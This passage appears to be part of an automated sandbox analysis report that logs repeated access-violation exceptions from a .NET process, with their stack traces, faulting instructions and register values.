45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483480 registers.edi: 33483820 registers.eax: 0 registers.ebp: 33483488 registers.edx: 0 registers.ebx: 33486212 registers.esi: 37938788 registers.ecx: 43575912	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd752d 0x7fd7400 0x7fd26fd 0x7fd1f58 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483244 registers.edi: 33483492 registers.eax: 0 registers.ebp: 33483504 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 37938788 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd79ae 0x7fd7400 0x7fd26fd 0x7fd1f58 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483480 registers.edi: 33483820 registers.eax: 0 registers.ebp: 33483488 registers.edx: 0 registers.ebx: 33486212 registers.esi: 37938788 registers.ecx: 38621772	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd7c7c 0x7fd7b30 0x7fd26e5 0x7fd205a 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483308 registers.edi: 33483556 registers.eax: 0 registers.ebp: 33483568 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd7f52 0x7fd7b30 0x7fd26e5 0x7fd205a 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483544 registers.edi: 33483820 registers.eax: 0 registers.ebp: 33483552 registers.edx: 0 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 39973136	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd7c7c 0x7fd7b30 0x7fd26fd 0x7fd205a 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483308 registers.edi: 33483556 registers.eax: 0 registers.ebp: 33483568 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd7f52 0x7fd7b30 0x7fd26fd 0x7fd205a 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483544 registers.edi: 33483820 registers.eax: 0 registers.ebp: 33483552 registers.edx: 0 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 41467792	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd7c7c 0x7fd7b30 0x7fd26fd 0x7fd205a 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483308 registers.edi: 33483556 registers.eax: 0 registers.ebp: 33483568 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd7f52 0x7fd7b30 0x7fd26fd 0x7fd205a 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483544 registers.edi: 33483820 registers.eax: 0 registers.ebp: 33483552 registers.edx: 0 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 38606112	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd82c5 0x7fd81a0 0x7fd26e5 0x7fd2147 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483328 registers.edi: 33483576 registers.eax: 0 registers.ebp: 33483588 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd857a 0x7fd81a0 0x7fd26e5 0x7fd2147 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483564 registers.edi: 33483820 registers.eax: 0 registers.ebp: 33483572 registers.edx: 0 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 40100848	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd82c5 0x7fd81a0 0x7fd26fd 0x7fd2147 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483328 registers.edi: 33483576 registers.eax: 0 registers.ebp: 33483588 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd857a 0x7fd81a0 0x7fd26fd 0x7fd2147 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483564 registers.edi: 33483820 registers.eax: 0 registers.ebp: 33483572 registers.edx: 0 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 41597884	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd82c5 0x7fd81a0 0x7fd26fd 0x7fd2147 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483328 registers.edi: 33483576 registers.eax: 0 registers.ebp: 33483588 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd857a 0x7fd81a0 0x7fd26fd 0x7fd2147 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483564 registers.edi: 33483820 registers.eax: 0 registers.ebp: 33483572 registers.edx: 0 registers.ebx: 33486212 registers.esi: 37937612 registers.ecx: 43094920	1
